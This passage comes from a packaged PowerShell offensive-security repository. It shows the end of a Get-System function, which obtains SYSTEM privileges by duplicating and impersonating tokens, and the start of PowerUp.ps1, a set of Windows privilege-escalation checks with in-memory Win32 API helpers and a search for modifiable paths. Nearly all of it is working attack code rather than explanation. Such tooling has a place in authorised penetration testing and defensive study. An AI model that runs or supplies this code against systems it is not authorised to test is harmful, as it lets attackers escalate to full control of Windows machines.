-Class Win32_Process | ForEach-Object {\n            try {\n                $OwnerInfo = $_.GetOwner()\n                if ($OwnerInfo.Domain -and $OwnerInfo.User) {\n                    $OwnerString = \"$($OwnerInfo.Domain)\\$($OwnerInfo.User)\".ToUpper()\n\n                    if ($OwnerString -eq $LocalSystemNTAccount.ToUpper()) {\n                        $Process = Get-Process -Id $_.ProcessId\n\n                        $Handle = $Win32Methods::OpenProcess(0x0400, $False, $Process.Id)\n                        if ($Handle) {\n                            $Handle\n                        }\n                    }\n                }\n            }\n            catch {\n                Write-Verbose \"[Get-System] error enumerating handle: $_\"\n            }\n        } | Where-Object {$_ -and ($_ -ne 0)} | Select-Object -First 1\n\n        if ((-not $SystemHandle) -or ($SystemHandle -eq 0)) {\n            Write-Error '[Get-System] Unable to obtain a handle to a system process.'\n        }\n        else {\n            [IntPtr]$SystemToken = [IntPtr]::Zero\n            $RetVal = $Win32Methods::OpenProcessToken(([IntPtr][Int] $SystemHandle), ($TOKEN_IMPERSONATE -bor $TOKEN_DUPLICATE), [ref]$SystemToken);$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n            Write-Verbose \"[Get-System] OpenProcessToken result: $RetVal\"\n            Write-Verbose \"[Get-System] OpenProcessToken result: $LastError\"\n\n            [IntPtr]$DulicateTokenHandle = [IntPtr]::Zero\n            $RetVal = $Win32Methods::DuplicateToken($SystemToken, 2, [ref]$DulicateTokenHandle);$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error()\n\n            Write-Verbose \"[Get-System] DuplicateToken result: $LastError\"\n\n            $RetVal = $Win32Methods::SetThreadToken([IntPtr]::Zero, $DulicateTokenHandle);$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error()\n            if(-not($RetVal)) {\n                Write-Error \"[Get-System] SetThreadToken failed, RetVal : $RetVal\" -ErrorAction Stop\n            }\n\n            Write-Verbose \"[Get-System] SetThreadToken result: $LastError\"\n            $null = $Win32Methods::CloseHandle($Handle)\n        }\n    }\n\n    if([System.Threading.Thread]::CurrentThread.GetApartmentState() -ne 'STA') {\n        Write-Error \"[Get-System] Script must be run in STA mode, relaunch powershell.exe with -STA flag\" -ErrorAction Stop\n    }\n\n    if($PSBoundParameters['WhoAmI']) {\n        Write-Output \"$([Environment]::UserDomainName)\\$([Environment]::UserName)\"\n        return\n    }\n\n    elseif($PSBoundParameters['RevToSelf']) {\n        $RevertToSelfAddr = Get-ProcAddress advapi32.dll RevertToSelf\n        $RevertToSelfDelegate = Get-DelegateType @() ([Bool])\n        $RevertToSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RevertToSelfAddr, $RevertToSelfDelegate)\n\n        $RetVal = $RevertToSelf.Invoke()\n        if($RetVal) {\n            Write-Output \"[Get-System] RevertToSelf successful.\"\n        }\n        else {\n            Write-Warning \"[Get-System] RevertToSelf failed.\"\n        }\n        Write-Output \"Running as: $([Environment]::UserDomainName)\\$([Environment]::UserName)\"\n    }\n\n    else {\n        if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')) {\n            Write-Error \"[Get-System] Script must be run as administrator\" -ErrorAction Stop\n        }\n\n        if($Technique -eq 'NamedPipe') {\n            # if we're using named pipe impersonation with a service\n            Get-SystemNamedPipe -ServiceName $ServiceName -PipeName $PipeName\n        }\n        else {\n            # otherwise use token duplication\n            Get-SystemToken\n        }\n        Write-Output \"Running as: $([Environment]::UserDomainName)\\$([Environment]::UserName)\"\n    }\n}\n"
  },
  {
    "path": "Privesc/PowerUp.ps1",
    "content": "<#\n\nPowerUp aims to be a clearinghouse of common Windows privilege escalation\nvectors that rely on misconfigurations. See README.md for more information.\n\nAuthor: @harmj0y\nLicense: BSD 3-Clause\nRequired Dependencies: None\nOptional Dependencies: None\n\n#>\n\n#Requires -Version 2\n\n\n########################################################\n#\n# PSReflect code for Windows API access\n# Author: @mattifestation\n#   https://raw.githubusercontent.com/mattifestation/PSReflect/master/PSReflect.psm1\n#\n########################################################\n\nfunction New-InMemoryModule {\n<#\n.SYNOPSIS\n\nCreates an in-memory assembly and module\n\nAuthor: Matthew Graeber (@mattifestation)\nLicense: BSD 3-Clause\nRequired Dependencies: None\nOptional Dependencies: None\n\n.DESCRIPTION\n\nWhen defining custom enums, structs, and unmanaged functions, it is\nnecessary to associate to an assembly module. This helper function\ncreates an in-memory module that can be passed to the 'enum',\n'struct', and Add-Win32Type functions.\n\n.PARAMETER ModuleName\n\nSpecifies the desired name for the in-memory assembly and module. If\nModuleName is not provided, it will default to a GUID.\n\n.EXAMPLE\n\n$Module = New-InMemoryModule -ModuleName Win32\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]\n    [CmdletBinding()]\n    Param (\n        [Parameter(Position = 0)]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $ModuleName = [Guid]::NewGuid().ToString()\n    )\n\n    $AppDomain = [Reflection.Assembly].Assembly.GetType('System.AppDomain').GetProperty('CurrentDomain').GetValue($null, @())\n    $LoadedAssemblies = $AppDomain.GetAssemblies()\n\n    foreach ($Assembly in $LoadedAssemblies) {\n        if ($Assembly.FullName -and ($Assembly.FullName.Split(',')[0] -eq $ModuleName)) {\n            return $Assembly\n        }\n    }\n\n    $DynAssembly = New-Object Reflection.AssemblyName($ModuleName)\n    $Domain = $AppDomain\n    $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, 'Run')\n    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule($ModuleName, $False)\n\n    return $ModuleBuilder\n}\n\n\n# A helper function used to reduce typing while defining function\n# prototypes for Add-Win32Type.\nfunction func {\n    Param (\n        [Parameter(Position = 0, Mandatory = $True)]\n        [String]\n        $DllName,\n\n        [Parameter(Position = 1, Mandatory = $True)]\n        [string]\n        $FunctionName,\n\n        [Parameter(Position = 2, Mandatory = $True)]\n        [Type]\n        $ReturnType,\n\n        [Parameter(Position = 3)]\n        [Type[]]\n        $ParameterTypes,\n\n        [Parameter(Position = 4)]\n        [Runtime.InteropServices.CallingConvention]\n        $NativeCallingConvention,\n\n        [Parameter(Position = 5)]\n        [Runtime.InteropServices.CharSet]\n        $Charset,\n\n        [String]\n        $EntryPoint,\n\n        [Switch]\n        $SetLastError\n    )\n\n    $Properties = @{\n        DllName = $DllName\n        FunctionName = $FunctionName\n        ReturnType = $ReturnType\n    }\n\n    if ($ParameterTypes) { $Properties['ParameterTypes'] = $ParameterTypes }\n    if ($NativeCallingConvention) { $Properties['NativeCallingConvention'] = $NativeCallingConvention }\n    if ($Charset) { $Properties['Charset'] = $Charset }\n    if ($SetLastError) { $Properties['SetLastError'] = $SetLastError }\n    if ($EntryPoint) { $Properties['EntryPoint'] = $EntryPoint }\n\n    New-Object PSObject -Property $Properties\n}\n\n\nfunction Add-Win32Type\n{\n<#\n.SYNOPSIS\n\nCreates a .NET type for an unmanaged Win32 function.\n\nAuthor: Matthew Graeber (@mattifestation)\nLicense: BSD 3-Clause\nRequired Dependencies: None\nOptional Dependencies: func\n\n.DESCRIPTION\n\nAdd-Win32Type enables you to easily interact with unmanaged (i.e.\nWin32 unmanaged) functions in PowerShell. After providing\nAdd-Win32Type with a function signature, a .NET type is created\nusing reflection (i.e. csc.exe is never called like with Add-Type).\n\nThe 'func' helper function can be used to reduce typing when defining\nmultiple function definitions.\n\n.PARAMETER DllName\n\nThe name of the DLL.\n\n.PARAMETER FunctionName\n\nThe name of the target function.\n\n.PARAMETER EntryPoint\n\nThe DLL export function name. This argument should be specified if the\nspecified function name is different than the name of the exported\nfunction.\n\n.PARAMETER ReturnType\n\nThe return type of the function.\n\n.PARAMETER ParameterTypes\n\nThe function parameters.\n\n.PARAMETER NativeCallingConvention\n\nSpecifies the native calling convention of the function. Defaults to\nstdcall.\n\n.PARAMETER Charset\n\nIf you need to explicitly call an 'A' or 'W' Win32 function, you can\nspecify the character set.\n\n.PARAMETER SetLastError\n\nIndicates whether the callee calls the SetLastError Win32 API\nfunction before returning from the attributed method.\n\n.PARAMETER Module\n\nThe in-memory module that will host the functions. Use\nNew-InMemoryModule to define an in-memory module.\n\n.PARAMETER Namespace\n\nAn optional namespace to prepend to the type. Add-Win32Type defaults\nto a namespace consisting only of the name of the DLL.\n\n.EXAMPLE\n\n$Mod = New-InMemoryModule -ModuleName Win32\n\n$FunctionDefinitions = @(\n  (func kernel32 GetProcAddress ([IntPtr]) @([IntPtr], [String]) -Charset Ansi -SetLastError),\n  (func kernel32 GetModuleHandle ([Intptr]) @([String]) -SetLastError),\n  (func ntdll RtlGetCurrentPeb ([IntPtr]) @())\n)\n\n$Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32'\n$Kernel32 = $Types['kernel32']\n$Ntdll = $Types['ntdll']\n$Ntdll::RtlGetCurrentPeb()\n$ntdllbase = $Kernel32::GetModuleHandle('ntdll')\n$Kernel32::GetProcAddress($ntdllbase, 'RtlGetCurrentPeb')\n\n.NOTES\n\nInspired by Lee Holmes' Invoke-WindowsApi http://poshcode.org/2189\n\nWhen defining multiple function prototypes, it is ideal to provide\nAdd-Win32Type with an array of function signatures. That way, they\nare all incorporated into the same in-memory module.\n#>\n\n    [OutputType([Hashtable])]\n    Param(\n        [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]\n        [String]\n        $DllName,\n\n        [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]\n        [String]\n        $FunctionName,\n\n        [Parameter(ValueFromPipelineByPropertyName=$True)]\n        [String]\n        $EntryPoint,\n\n        [Parameter(Mandatory=$True, ValueFromPipelineByPropertyName=$True)]\n        [Type]\n        $ReturnType,\n\n        [Parameter(ValueFromPipelineByPropertyName=$True)]\n        [Type[]]\n        $ParameterTypes,\n\n        [Parameter(ValueFromPipelineByPropertyName=$True)]\n        [Runtime.InteropServices.CallingConvention]\n        $NativeCallingConvention = [Runtime.InteropServices.CallingConvention]::StdCall,\n\n        [Parameter(ValueFromPipelineByPropertyName=$True)]\n        [Runtime.InteropServices.CharSet]\n        $Charset = [Runtime.InteropServices.CharSet]::Auto,\n\n        [Parameter(ValueFromPipelineByPropertyName=$True)]\n        [Switch]\n        $SetLastError,\n\n        [Parameter(Mandatory=$True)]\n        [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]\n        $Module,\n\n        [ValidateNotNull()]\n        [String]\n        $Namespace = ''\n    )\n\n    BEGIN\n    {\n        $TypeHash = @{}\n    }\n\n    PROCESS\n    {\n        if ($Module -is [Reflection.Assembly])\n        {\n            if ($Namespace)\n            {\n                $TypeHash[$DllName] = $Module.GetType(\"$Namespace.$DllName\")\n            }\n            else\n            {\n                $TypeHash[$DllName] = $Module.GetType($DllName)\n            }\n        }\n        else\n        {\n            # Define one type for each DLL\n            if (!$TypeHash.ContainsKey($DllName))\n            {\n                if ($Namespace)\n                {\n                    $TypeHash[$DllName] = $Module.DefineType(\"$Namespace.$DllName\", 'Public,BeforeFieldInit')\n                }\n                else\n                {\n                    $TypeHash[$DllName] = $Module.DefineType($DllName, 'Public,BeforeFieldInit')\n                }\n            }\n\n            $Method = $TypeHash[$DllName].DefineMethod(\n                $FunctionName,\n                'Public,Static,PinvokeImpl',\n                $ReturnType,\n                $ParameterTypes)\n\n            # Make each ByRef parameter an Out parameter\n            $i = 1\n            foreach($Parameter in $ParameterTypes)\n            {\n                if ($Parameter.IsByRef)\n                {\n                    [void] $Method.DefineParameter($i, 'Out', $null)\n                }\n\n                $i++\n            }\n\n            $DllImport = [Runtime.InteropServices.DllImportAttribute]\n            $SetLastErrorField = $DllImport.GetField('SetLastError')\n            $CallingConventionField = $DllImport.GetField('CallingConvention')\n            $CharsetField = $DllImport.GetField('CharSet')\n            $EntryPointField = $DllImport.GetField('EntryPoint')\n            if ($SetLastError) { $SLEValue = $True } else { $SLEValue = $False }\n\n            if ($PSBoundParameters['EntryPoint']) { $ExportedFuncName = $EntryPoint } else { $ExportedFuncName = $FunctionName }\n\n            # Equivalent to C# version of [DllImport(DllName)]\n            $Constructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor([String])\n            $DllImportAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($Constructor,\n                $DllName, [Reflection.PropertyInfo[]] @(), [Object[]] @(),\n                [Reflection.FieldInfo[]] @($SetLastErrorField,\n                                           $CallingConventionField,\n                                           $CharsetField,\n                                           $EntryPointField),\n                [Object[]] @($SLEValue,\n                             ([Runtime.InteropServices.CallingConvention] $NativeCallingConvention),\n                             ([Runtime.InteropServices.CharSet] $Charset),\n                             $ExportedFuncName))\n\n            $Method.SetCustomAttribute($DllImportAttribute)\n        }\n    }\n\n    END\n    {\n        if ($Module -is [Reflection.Assembly])\n        {\n            return $TypeHash\n        }\n\n        $ReturnTypes = @{}\n\n        foreach ($Key in $TypeHash.Keys)\n        {\n            $Type = $TypeHash[$Key].CreateType()\n\n            $ReturnTypes[$Key] = $Type\n        }\n\n        return $ReturnTypes\n    }\n}\n\n\nfunction psenum {\n<#\n.SYNOPSIS\n\nCreates an in-memory enumeration for use in your PowerShell session.\n\nAuthor: Matthew Graeber (@mattifestation)\nLicense: BSD 3-Clause\nRequired Dependencies: None\nOptional Dependencies: None\n\n.DESCRIPTION\n\nThe 'psenum' function facilitates the creation of enums entirely in\nmemory using as close to a \"C style\" as PowerShell will allow.\n\n.PARAMETER Module\n\nThe in-memory module that will host the enum. Use\nNew-InMemoryModule to define an in-memory module.\n\n.PARAMETER FullName\n\nThe fully-qualified name of the enum.\n\n.PARAMETER Type\n\nThe type of each enum element.\n\n.PARAMETER EnumElements\n\nA hashtable of enum elements.\n\n.PARAMETER Bitfield\n\nSpecifies that the enum should be treated as a bitfield.\n\n.EXAMPLE\n\n$Mod = New-InMemoryModule -ModuleName Win32\n\n$ImageSubsystem = psenum $Mod PE.IMAGE_SUBSYSTEM UInt16 @{\n    UNKNOWN =                  0\n    NATIVE =                   1 # Image doesn't require a subsystem.\n    WINDOWS_GUI =              2 # Image runs in the Windows GUI subsystem.\n    WINDOWS_CUI =              3 # Image runs in the Windows character subsystem.\n    OS2_CUI =                  5 # Image runs in the OS/2 character subsystem.\n    POSIX_CUI =                7 # Image runs in the Posix character subsystem.\n    NATIVE_WINDOWS =           8 # Image is a native Win9x driver.\n    WINDOWS_CE_GUI =           9 # Image runs in the Windows CE subsystem.\n    EFI_APPLICATION =          10\n    EFI_BOOT_SERVICE_DRIVER =  11\n    EFI_RUNTIME_DRIVER =       12\n    EFI_ROM =                  13\n    XBOX =                     14\n    WINDOWS_BOOT_APPLICATION = 16\n}\n\n.NOTES\n\nPowerShell purists may disagree with the naming of this function but\nagain, this was developed in such a way so as to emulate a \"C style\"\ndefinition as closely as possible. Sorry, I'm not going to name it\nNew-Enum. :P\n#>\n\n    [OutputType([Type])]\n    Param (\n        [Parameter(Position = 0, Mandatory=$True)]\n        [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]\n        $Module,\n\n        [Parameter(Position = 1, Mandatory=$True)]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $FullName,\n\n        [Parameter(Position = 2, Mandatory=$True)]\n        [Type]\n        $Type,\n\n        [Parameter(Position = 3, Mandatory=$True)]\n        [ValidateNotNullOrEmpty()]\n        [Hashtable]\n        $EnumElements,\n\n        [Switch]\n        $Bitfield\n    )\n\n    if ($Module -is [Reflection.Assembly])\n    {\n        return ($Module.GetType($FullName))\n    }\n\n    $EnumType = $Type -as [Type]\n\n    $EnumBuilder = $Module.DefineEnum($FullName, 'Public', $EnumType)\n\n    if ($Bitfield)\n    {\n        $FlagsConstructor = [FlagsAttribute].GetConstructor(@())\n        $FlagsCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder($FlagsConstructor, @())\n        $EnumBuilder.SetCustomAttribute($FlagsCustomAttribute)\n    }\n\n    foreach ($Key in $EnumElements.Keys)\n    {\n        # Apply the specified enum type to each element\n        $null = $EnumBuilder.DefineLiteral($Key, $EnumElements[$Key] -as $EnumType)\n    }\n\n    $EnumBuilder.CreateType()\n}\n\n\n# A helper function used to reduce typing while defining struct\n# fields.\nfunction field {\n    Param (\n        [Parameter(Position = 0, Mandatory=$True)]\n        [UInt16]\n        $Position,\n\n        [Parameter(Position = 1, Mandatory=$True)]\n        [Type]\n        $Type,\n\n        [Parameter(Position = 2)]\n        [UInt16]\n        $Offset,\n\n        [Object[]]\n        $MarshalAs\n    )\n\n    @{\n        Position = $Position\n        Type = $Type -as [Type]\n        Offset = $Offset\n        MarshalAs = $MarshalAs\n    }\n}\n\n\nfunction struct\n{\n<#\n.SYNOPSIS\n\nCreates an in-memory struct for use in your PowerShell session.\n\nAuthor: Matthew Graeber (@mattifestation)\nLicense: BSD 3-Clause\nRequired Dependencies: None\nOptional Dependencies: field\n\n.DESCRIPTION\n\nThe 'struct' function facilitates the creation of structs entirely in\nmemory using as close to a \"C style\" as PowerShell will allow. Struct\nfields are specified using a hashtable where each field of the struct\nis comprosed of the order in which it should be defined, its .NET\ntype, and optionally, its offset and special marshaling attributes.\n\nOne of the features of 'struct' is that after your struct is defined,\nit will come with a built-in GetSize method as well as an explicit\nconverter so that you can easily cast an IntPtr to the struct without\nrelying upon calling SizeOf and/or PtrToStructure in the Marshal\nclass.\n\n.PARAMETER Module\n\nThe in-memory module that will host the struct. Use\nNew-InMemoryModule to define an in-memory module.\n\n.PARAMETER FullName\n\nThe fully-qualified name of the struct.\n\n.PARAMETER StructFields\n\nA hashtable of fields. Use the 'field' helper function to ease\ndefining each field.\n\n.PARAMETER PackingSize\n\nSpecifies the memory alignment of fields.\n\n.PARAMETER ExplicitLayout\n\nIndicates that an explicit offset for each field will be specified.\n\n.EXAMPLE\n\n$Mod = New-InMemoryModule -ModuleName Win32\n\n$ImageDosSignature = psenum $Mod PE.IMAGE_DOS_SIGNATURE UInt16 @{\n    DOS_SIGNATURE =    0x5A4D\n    OS2_SIGNATURE =    0x454E\n    OS2_SIGNATURE_LE = 0x454C\n    VXD_SIGNATURE =    0x454C\n}\n\n$ImageDosHeader = struct $Mod PE.IMAGE_DOS_HEADER @{\n    e_magic =    field 0 $ImageDosSignature\n    e_cblp =     field 1 UInt16\n    e_cp =       field 2 UInt16\n    e_crlc =     field 3 UInt16\n    e_cparhdr =  field 4 UInt16\n    e_minalloc = field 5 UInt16\n    e_maxalloc = field 6 UInt16\n    e_ss =       field 7 UInt16\n    e_sp =       field 8 UInt16\n    e_csum =     field 9 UInt16\n    e_ip =       field 10 UInt16\n    e_cs =       field 11 UInt16\n    e_lfarlc =   field 12 UInt16\n    e_ovno =     field 13 UInt16\n    e_res =      field 14 UInt16[] -MarshalAs @('ByValArray', 4)\n    e_oemid =    field 15 UInt16\n    e_oeminfo =  field 16 UInt16\n    e_res2 =     field 17 UInt16[] -MarshalAs @('ByValArray', 10)\n    e_lfanew =   field 18 Int32\n}\n\n# Example of using an explicit layout in order to create a union.\n$TestUnion = struct $Mod TestUnion @{\n    field1 = field 0 UInt32 0\n    field2 = field 1 IntPtr 0\n} -ExplicitLayout\n\n.NOTES\n\nPowerShell purists may disagree with the naming of this function but\nagain, this was developed in such a way so as to emulate a \"C style\"\ndefinition as closely as possible. Sorry, I'm not going to name it\nNew-Struct. :P\n#>\n\n    [OutputType([Type])]\n    Param (\n        [Parameter(Position = 1, Mandatory=$True)]\n        [ValidateScript({($_ -is [Reflection.Emit.ModuleBuilder]) -or ($_ -is [Reflection.Assembly])})]\n        $Module,\n\n        [Parameter(Position = 2, Mandatory=$True)]\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $FullName,\n\n        [Parameter(Position = 3, Mandatory=$True)]\n        [ValidateNotNullOrEmpty()]\n        [Hashtable]\n        $StructFields,\n\n        [Reflection.Emit.PackingSize]\n        $PackingSize = [Reflection.Emit.PackingSize]::Unspecified,\n\n        [Switch]\n        $ExplicitLayout\n    )\n\n    if ($Module -is [Reflection.Assembly])\n    {\n        return ($Module.GetType($FullName))\n    }\n\n    [Reflection.TypeAttributes] $StructAttributes = 'AnsiClass,\n        Class,\n        Public,\n        Sealed,\n        BeforeFieldInit'\n\n    if ($ExplicitLayout)\n    {\n        $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::ExplicitLayout\n    }\n    else\n    {\n        $StructAttributes = $StructAttributes -bor [Reflection.TypeAttributes]::SequentialLayout\n    }\n\n    $StructBuilder = $Module.DefineType($FullName, $StructAttributes, [ValueType], $PackingSize)\n    $ConstructorInfo = [Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]\n    $SizeConst = @([Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))\n\n    $Fields = New-Object Hashtable[]($StructFields.Count)\n\n    # Sort each field according to the orders specified\n    # Unfortunately, PSv2 doesn't have the luxury of the\n    # hashtable [Ordered] accelerator.\n    foreach ($Field in $StructFields.Keys)\n    {\n        $Index = $StructFields[$Field]['Position']\n        $Fields[$Index] = @{FieldName = $Field; Properties = $StructFields[$Field]}\n    }\n\n    foreach ($Field in $Fields)\n    {\n        $FieldName = $Field['FieldName']\n        $FieldProp = $Field['Properties']\n\n        $Offset = $FieldProp['Offset']\n        $Type = $FieldProp['Type']\n        $MarshalAs = $FieldProp['MarshalAs']\n\n        $NewField = $StructBuilder.DefineField($FieldName, $Type, 'Public')\n\n        if ($MarshalAs)\n        {\n            $UnmanagedType = $MarshalAs[0] -as ([Runtime.InteropServices.UnmanagedType])\n            if ($MarshalAs[1])\n            {\n                $Size = $MarshalAs[1]\n                $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo,\n                    $UnmanagedType, $SizeConst, @($Size))\n            }\n            else\n            {\n                $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, [Object[]] @($UnmanagedType))\n            }\n\n            $NewField.SetCustomAttribute($AttribBuilder)\n        }\n\n        if ($ExplicitLayout) { $NewField.SetOffset($Offset) }\n    }\n\n    # Make the struct aware of its own size.\n    # No more having to call [Runtime.InteropServices.Marshal]::SizeOf!\n    $SizeMethod = $StructBuilder.DefineMethod('GetSize',\n        'Public, Static',\n        [Int],\n        [Type[]] @())\n    $ILGenerator = $SizeMethod.GetILGenerator()\n    # Thanks for the help, Jason Shirk!\n    $ILGenerator.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder)\n    $ILGenerator.Emit([Reflection.Emit.OpCodes]::Call,\n        [Type].GetMethod('GetTypeFromHandle'))\n    $ILGenerator.Emit([Reflection.Emit.OpCodes]::Call,\n        [Runtime.InteropServices.Marshal].GetMethod('SizeOf', [Type[]] @([Type])))\n    $ILGenerator.Emit([Reflection.Emit.OpCodes]::Ret)\n\n    # Allow for explicit casting from an IntPtr\n    # No more having to call [Runtime.InteropServices.Marshal]::PtrToStructure!\n    $ImplicitConverter = $StructBuilder.DefineMethod('op_Implicit',\n        'PrivateScope, Public, Static, HideBySig, SpecialName',\n        $StructBuilder,\n        [Type[]] @([IntPtr]))\n    $ILGenerator2 = $ImplicitConverter.GetILGenerator()\n    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Nop)\n    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldarg_0)\n    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ldtoken, $StructBuilder)\n    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call,\n        [Type].GetMethod('GetTypeFromHandle'))\n    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Call,\n        [Runtime.InteropServices.Marshal].GetMethod('PtrToStructure', [Type[]] @([IntPtr], [Type])))\n    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Unbox_Any, $StructBuilder)\n    $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ret)\n\n    $StructBuilder.CreateType()\n}\n\n\n########################################################\n#\n# PowerUp Helpers\n#\n########################################################\n\nfunction Get-ModifiablePath {\n<#\n.SYNOPSIS\n\nParses a passed string containing multiple possible file/folder paths and returns\nthe file paths where the current user has modification rights.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \n\n.DESCRIPTION\n\nTakes a complex path specification of an initial file/folder path with possible\nconfiguration files, 'tokenizes' the string in a number of possible ways, and\nenumerates the ACLs for each path that currently exists on the system. Any path that\nthe current user has modification rights on is returned in a custom object that contains\nthe modifiable path, associated permission set, and the IdentityReference with the specified\nrights. The SID of the current user and any group he/she are a part of are used as the\ncomparison set against the parsed path DACLs.\n\n.PARAMETER Path\n\nThe string path to parse for modifiable files. Required\n\n.PARAMETER Literal\n\nSwitch. Treat all paths as literal (i.e. don't do 'tokenization').\n\n.EXAMPLE\n\n'\"C:\\Temp\\blah.exe\" -f \"C:\\Temp\\config.ini\"' | Get-ModifiablePath\n\nPath                       Permissions                IdentityReference\n----                       -----------                -----------------\nC:\\Temp\\blah.exe           {ReadAttributes, ReadCo... NT AUTHORITY\\Authentic...\nC:\\Temp\\config.ini         {ReadAttributes, ReadCo... NT AUTHORITY\\Authentic...\n\n.EXAMPLE\n\nGet-ChildItem C:\\Vuln\\ -Recurse | Get-ModifiablePath\n\nPath                       Permissions                IdentityReference\n----                       -----------                -----------------\nC:\\Vuln\\blah.bat           {ReadAttributes, ReadCo... NT AUTHORITY\\Authentic...\nC:\\Vuln\\config.ini         {ReadAttributes, ReadCo... NT AUTHORITY\\Authentic...\n...\n\n.OUTPUTS\n\nPowerUp.TokenPrivilege.ModifiablePath\n\nCustom PSObject containing the Permissions, ModifiablePath, IdentityReference for\na modifiable path.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerUp.ModifiablePath')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('FullName')]\n        [String[]]\n        $Path,\n\n        [Alias('LiteralPaths')]\n        [Switch]\n        $Literal\n    )\n\n    BEGIN {\n        # from http://stackoverflow.com/questions/28029872/retrieving-security-descriptor-and-getting-number-for-filesystemrights\n        $AccessMask = @{\n            [uint32]'0x80000000' = 'GenericRead'\n            [uint32]'0x40000000' = 'GenericWrite'\n            [uint32]'0x20000000' = 'GenericExecute'\n            [uint32]'0x10000000' = 'GenericAll'\n            [uint32]'0x02000000' = 'MaximumAllowed'\n            [uint32]'0x01000000' = 'AccessSystemSecurity'\n            [uint32]'0x00100000' = 'Synchronize'\n            [uint32]'0x00080000' = 'WriteOwner'\n            [uint32]'0x00040000' = 'WriteDAC'\n            [uint32]'0x00020000' = 'ReadControl'\n            [uint32]'0x00010000' = 'Delete'\n            [uint32]'0x00000100' = 'WriteAttributes'\n            [uint32]'0x00000080' = 'ReadAttributes'\n            [uint32]'0x00000040' = 'DeleteChild'\n            [uint32]'0x00000020' = 'Execute/Traverse'\n            [uint32]'0x00000010' = 'WriteExtendedAttributes'\n            [uint32]'0x00000008' = 'ReadExtendedAttributes'\n            [uint32]'0x00000004' = 'AppendData/AddSubdirectory'\n            [uint32]'0x00000002' = 'WriteData/AddFile'\n            [uint32]'0x00000001' = 'ReadData/ListDirectory'\n        }\n\n        $UserIdentity = [System.Security.Principal.WindowsIdentity]::GetCurrent()\n        $CurrentUserSids = $UserIdentity.Groups | Select-Object -ExpandProperty Value\n        $CurrentUserSids += $UserIdentity.User.Value\n        $TranslatedIdentityReferences = @{}\n    }\n\n    PROCESS {\n\n        ForEach($TargetPath in $Path) {\n\n            $CandidatePaths = @()\n\n            # possible separator character combinations\n            $SeparationCharacterSets = @('\"', \"'\", ' ', \"`\"'\", '\" ', \"' \", \"`\"' \")\n\n            if ($PSBoundParameters['Literal']) {\n\n                $TempPath = $([System.Environment]::ExpandEnvironmentVariables($TargetPath))\n\n                if (Test-Path -Path $TempPath -ErrorAction SilentlyContinue) {\n                    $CandidatePaths += Resolve-Path -Path $TempPath | Select-Object -ExpandProperty Path\n                }\n                else {\n                    # if the path doesn't exist, check if the parent folder allows for modification\n                    $ParentPath = Split-Path -Path $TempPath -Parent  -ErrorAction SilentlyContinue\n                    if ($ParentPath -and (Test-Path -Path $ParentPath)) {\n                        $CandidatePaths += Resolve-Path -Path $ParentPath -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path\n                    }\n                }\n            }\n            else {\n                ForEach($SeparationCharacterSet in $SeparationCharacterSets) {\n                    $TargetPath.Split($SeparationCharacterSet) | Where-Object {$_ -and ($_.trim() -ne '')} | ForEach-Object {\n\n                        if (($SeparationCharacterSet -notmatch ' ')) {\n\n                            $TempPath = $([System.Environment]::ExpandEnvironmentVariables($_)).Trim()\n\n                            if ($TempPath -and ($TempPath -ne '')) {\n                                if (Test-Path -Path $TempPath -ErrorAction SilentlyContinue) {\n                                    # if the path exists, resolve it and add it to the candidate list\n                                    $CandidatePaths += Resolve-Path -Path $TempPath | Select-Object -ExpandProperty Path\n                                }\n\n                                else {\n                                    # if the path doesn't exist, check if the parent folder allows for modification\n                                    try {\n                                        $ParentPath = (Split-Path -Path $TempPath -Parent -ErrorAction SilentlyContinue).Trim()\n                                        if ($ParentPath -and ($ParentPath -ne '') -and (Test-Path -Path $ParentPath  -ErrorAction SilentlyContinue)) {\n                                            $CandidatePaths += Resolve-Path -Path $ParentPath -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path\n                                        }\n                                    }\n                                    catch {}\n                                }\n                            }\n                        }\n                        else {\n                     